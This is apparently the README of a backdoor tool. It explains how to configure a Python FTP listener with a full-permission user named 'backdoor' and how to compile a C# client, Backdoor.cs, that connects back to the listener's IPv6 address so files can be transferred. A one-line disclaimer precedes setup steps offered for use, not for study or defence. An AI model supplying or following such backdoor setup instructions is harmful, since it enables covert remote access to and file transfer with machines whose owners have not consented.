- By using anything from this repository you agree that you will not use it for harm and I am not accountable for any harm or trouble you cause.
- Open Listener.py.
- Locate the occurrences of
ipv6
in the code (there should be around 3 instances). - Replace
ipv6
with the IPv6 address of the computer running the listener.
- Find the
def setup_users
section in the code. - Set the home location "whatever location you want" to the home location you want for the ftp server.
- EX: authorizer.add_user("backdoor", "backdoor", "/home/user/folder", perm="elradfmw").
To send a file:
- Place the file you want to send in the directory you specified in the user's location.
- Open the solution in Visual Studios and in Backdoor.cs look for the variable
ServerIPv6Address
and set it to the computer's address that is running the listener. - Build the application and it's ready to go.